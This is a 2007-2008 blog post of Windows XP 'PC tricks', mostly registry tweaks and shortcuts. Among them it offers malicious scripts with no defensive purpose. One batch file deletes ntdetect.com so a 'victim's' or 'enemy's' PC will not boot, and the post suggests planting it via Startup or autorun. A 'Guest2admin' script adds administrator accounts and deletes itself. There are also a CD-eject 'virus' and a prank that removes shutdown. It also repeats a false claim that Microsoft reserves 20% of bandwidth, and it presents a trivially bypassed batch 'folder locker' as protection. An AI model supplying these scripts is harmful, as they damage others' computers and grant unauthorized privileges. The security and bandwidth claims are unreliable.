Sunday, April 27, 2008

PC tricks - Most wanted

Create desktop icon for restart and shutdown



Do the following:


1. Right click on your desktop


2. Then in NEW click on SHORTCUT


3. A shortcut wizard will appear


4. Type this in the box:


shutdown -s -t 00


5. Your done now right click on the folder>properties>Change Icon


And then choose any appropriate icon


For restart instead of -s type -r





Remove shut down option



Wanna play with your friends by removing the shutdown option from start menu in their computer.


Click on start>run(win key+r)


Then tpye “regedit” there, this opens up the registry editor, now goto


HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Explorer


Then set “NoClose”=”DWORD:1





Lock any folder without using any software



1. Suppose you have a folder named abcd in D:\abcd.


2. In the same drive next to the folder create a new notepad file with the exact statement


ren abcd abcd.{21EC2020-3AEA-1069-A2DD-08002B30309D}


3. Now save this text file as loc.bat


4. Create another notepad file and type


ren abcd.{21EC2020-3AEA-1069-A2DD-08002B30309D} abcd


5. Save this as key.bat


6. Now there are two batch files. Double click loc.bat and your folder will change into Control Panel and its contents cannot be viewed .


7. To open the folder double click key.bat and you get back your original folder.


8. For more safety keep the key.bat in another location . Only for unlocking copy paste to the original location and double click


(don't forget to replace abcd with the folder name)




OR




Paste it in notepad.


cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


Save it as batch file(with extension .bat).Any name will do.


Now you see a batch file.


Double click it to create a folder locker.


A new folder named Locker would be formed at the same location.


Now brings all the files you want to hide in the locker folder.


Now double click the batch file to lock the folder namely Locker.


If you want to unlock your files,double click the batch file again and you would be prompted for password.


Enter the password and enjoy access to the folder.





A virus that will open and close your CD rom



copy this into notepad


Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


Save it as anyname.vbs like virus.vbs


And then double click on it.


Now if u want to disable this go to task manager click on process


Then find wscript.exe and end this process





Block your enemies PC



Open notepad and copy the below code


echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
print U r a LOSER GK is a Winner


Save this file as virus.bat or any other name with .bat extension


Double click it in the victim's computer or Put it in Startup of Ur enemy or put it in a CD and set it in the autorun.


With this activated once the computer will run perfectly


Once shutdowned then it will not start and U will have to format it (Except U know how to use DOS).





How to install programs and games in a limited account meaning an account thats not an administrator



This might not always work but it's pretty useful because your able to install programs although your administrator has bloked it.


Steps


1. When your installing the program here is what you have to do.


2. When it gives you the option of choosing the directory or destination where the program will be intall, before clicking next click browse to choose a different destination.


3. The destination your going to choose is


C:\Documents and Settings\"your username"\"name of program being installed"\


4. So just browse to


The C:\ drive


Then Documents and Settings


Then your User Name


5. The reason why you do this is because since your intalling it in your account name the computer doesn't stop or check anything because its your account and your name, but if you just select the desktop and choose to install it there it going to say something like "you do not have enough administrative privileges" something like that.





Much Simpler trick to Hack admin from Guest



HaCk "GUEST" with Admin privileges


Copy this to notepad


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


Save the file as "Guest2admin.bat"


then u can double click the file to execute or run in the cmd.





Automatically close non-responsive programs



With a small registry tweak, Windows XP can be set to automatically close any program that 'stops responding' (crashes), eliminating the need for you to use the task manager to close down the offending software manually.


To do this:


Open REGEDIT and navigate to HKEY_CURRENT_USER\Control Panel\ Desktop


Modify the REG_SZ entry AutoEndTasks with a value of 1





Display Pentium 5 or more in windows Xp



NOW U CAN ABLE TO SHOW PENTIUM 5 AND EVEN MORE


TYPE "REGEDIT" IN RUN BOX {START->RUN->TYPE REGEDIT}


NOW CLICK IN


H-KEY-LOCAL-MACHIN . THEN ON HARDWARE. THEN ON DISCRIPTION.THEN ON SYSTEM,THEN ON CentralProcessor.THEN ON 0


{H-KEY-LOCAL-MACHIN/HARDWARE/DISCRIPTION/SYSTEM/CentralProcessor/0}


NOW U GET IN RIGHT PANE THE VALUE THAT IS"ProcessorNameString"


DOUBLE CLICK ON THIS VALUE


VALUE NAME AND VALUE DATA IS NOW IN FROUNT OF U NOW IN DATA COLOM U CAN EDIT IT RANDOMLY WHAT U WANT IN PLACE OF THAT VALUE AND THEN PRESS OK


NOW SEE SYSTEM PROPERTY JUST RIGHT CLICKING IN U ARE MY COMPUTER ICON OR SEE SYSTEM PROPERTY JUST BY PRESSING {WIN+PAUSE BREAK }





Make your start menu run faster



1. Go to to 'run' Type regedit.


2. Browse to HKEY_CURRENT_USER > CONTROL PANEL > DESKTOP


3. There is an key called 'MenuShowDelay'


4. Double click on it and change 400 to 0


5. Click 'ok' and restart your computer to see changes to take effect





Set Wallpapers in Drives



All you have to do is just create a "Notepad" file and copy paste this in your Drive


[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\sunset.jpg
iconarea_text=0x00FFFFFF


Save it as desktop.ini





Hide your files in jpeg format



Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.


1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).


2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).


3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.


4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.


5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. :D


6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .

Wednesday, February 21, 2007

Deleting System Softwares:

XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.


Creating Shutdown Icon or One Click Shutdown:

Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path.
Use this path in "Type Location of the Item"
SHUTDOWN -s -t 01
If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.


Increasing Band-Width By 20%:

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc

To get it back:

Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:
Local Computer Policy then Computer Configuration then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth.


Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab i.e."By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.


Renaming The Recycle Bin icon:

To change the name of the Recycle Bin desktop icon, click Start then goto Run, write Regedit and press Enter. It opens Registry Editor. Now in Registry Editor go to:

HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
and change the name "Recycle Bin" to whatever you want (don't type any quotes).


Managing Tasks:

You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

Removing Shared Documents folder From My Computer window:

Open registry editor by going to Start then Run and entering regedit. Once in registry, navigate to key

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders

You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.


Making Google the Default Search Engine in Internet Explorer:

Open registry editor by going to Start then Run and entering regedit and navigate to following three keys separately and change it as shown below:

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Search Page"=" http://www.google.com"
"Search Bar"=" http://www.google.com/ie"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchURL]
""=" http://www.google.com/keyword/%s"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"=" http://www.google.com/ie" .


Improving the Slow Boot up time:

There are a variety of reasons why your windows XP system would boot slowly. Most of the times it this has to do with the startup applications. If you would like to speed up the bootup sequence, consider removing some of the startup applications that you do not need. Easiest way to remove startup apps is through System Configuration Utility. Go to Start then Run and enter MSCONFIG and go to the Startup tab. Deselect/UnCheck application(s) that you do not want to startup at boot time.


Customize Logon prompt with your Own Words:

Open Registry by going to Start then Run, entering regedit and Navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]. In right pane, look for key by the name "LogonPrompt". Set its value to whatever text you want to see displayed at login screen.

IP address of your connection:
Go to Start then Run. Enter 'cmd' and then enter 'ipconfig' .Add the '/all' switch for more info.


Making Folders Private:

Open My Computer Double-click the drive where Windows is installed (usually drive (C:), unless you have more than one drive on your computer). If the contents of the drive are hidden, under System Tasks, click Show the contents of this drive.
Double-click the Documents and Settings folder. Double-click your user folder. Right-click any folder in your user profile, and then click Properties. On the Sharing tab, select the Make this folder private so that only I have access to it check box.


To change Drive Letters:

Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "change drive letter and paths."
From here you can add, remove or change drive letters and paths to the partition.


Removing the Shortcut arrow from Desktop Icons:

Goto Start then Run and Enter regedit. Navigate to HKEY_CLASSES_ROOTlnkfile. Delete the IsShortcut registry value. You may need to restart Windows XP.


Get Drivers for your Devices:

Visit Windows Update (XP Only)
Look at the left hand pane and under Other Options click Personalize Windows Update.
Now in the right hand pane check the box - Display the link to the Windows Update Catalog under See Also
Below Choose which categories and updates to display on Windows Update - make sure you check all the boxes you want shown.
Click Save Settings
Now look in the left hand pane under See Also click Windows Update Catalog and choose what you're looking for. Choose either MS updates or drivers for hardware devices.
Start the Wizard and off you go.


Customize Internet Explorer's Title Bar:

Open Registry by going to Start then Run and Enter regedit. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet. Explorer\Main. In right hand panel look for string "Window Title" and change its value to whatever custom text you want to see.


Disabling the use of Win Key:

If your are a gaming freak then you must be sick of the Win key in your keyboard. To disable use of Win key, open registry by going to Start then Run and entering regedit. Navigate to [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout] . In this look for value of "Scancode Map". Its binary data so be extra careful:
Set its value to "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00" to disable the win key.

Restarting Windows without Restarting the Computer:

This one is again is. When you click on the SHUTDOWN button, make sure to simultaneous press SHIFT Button. If you hold the Shift key down while clicking on SHUTDOWN button, you computer would restart without restarting the Computer. This is equivalent to term "HOT REBOOT".


Stopping XP from displaying unread messages count on Welcome Screen:

To stop XP from displaying count of unread messages, Open registry and navigate to [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\UnreadMail] and look for the data key "MessageExpiryDays". If you do not see this key, create one DWORD key by the name "MessageExpiryDays". Setting its value to 0 would stop Windows XP from displaying the count of unread messages.


Modify Color Selection of Default Theme:

Open registry by going to Start then Run. Entering regedit, navigate to [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager] and locate the key "ColorName".
Right Click on it and select modify its value from "NormalColor" to "Metallic"
Click Ok, and exit regedit and restart your computer.


Removing the Recycle Bin from the Desktop:

If you don't use the Recycle Bin to store deleted files , you can get rid of its desktop icon all together. Run Regedit and go to:

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/explorer/Desktop/NameSpace